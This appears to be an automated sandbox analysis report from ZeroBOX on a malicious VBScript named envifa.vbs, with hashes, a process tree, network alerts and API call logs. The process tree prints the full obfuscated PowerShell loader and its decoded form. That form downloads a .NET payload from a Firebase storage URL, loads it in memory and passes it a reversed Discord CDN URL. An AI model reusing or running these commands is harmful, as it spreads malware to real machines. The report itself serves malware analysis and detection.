popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

envifa.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 9, 2024, 10:45 a.m. Aug. 9, 2024, 10:47 a.m.
Size 11.3MB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 23cef0c9c3e02cc2bdc8516b889d1191
SHA256 16b1375e4fb1306be8f8952f0469b86eb570718c8e4a2b8633809c8e1967ebee
CRC32 CB89179F
ssdeep 1536:BPDVP1P4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPZ:pU
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\envifa.vbs

    3044

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;

      2196

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"

        2344

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 142.250.196.234:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
142.250.196.234:443 		C=US, O=Google Trust Services, CN=WR2 CN=upload.video.google.com c4:3f:12:39:d2:ec:4c:2c:1c:0a:a6:18:8e:2a:97:2c:d8:c2:7e:af

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: urned an error: (400) Bad Request."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:166
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Downl
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: oadString <<<< ('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.app
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: spot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-0411345
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 77ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb00
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: 40b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080iv
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:spt
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: th' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' )
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: Multiple ambiguous overloads found for "Load" and the argument count: "1".
console_handle: 0x000000eb
1 1 0

WriteConsoleW

 buffer: At line:1 char:356
console_handle: 0x000000f7
1 1 0

WriteConsoleW

 buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]
console_handle: 0x00000103
1 1 0

WriteConsoleW

 buffer: ] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Downl
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: oadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.c
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: om/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: ));[system.AppDomain]::CurrentDomain.Load <<<< ($fpmxy).GetType('ClassLibrary3.
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb00
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: 40b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080iv
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: ne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:spt
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: th' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' )
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodException
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : MethodCountCouldNotFindBest
console_handle: 0x00000187
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452790
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00451d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00451d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00595680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02282000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02283000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02284000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02285000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02286000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

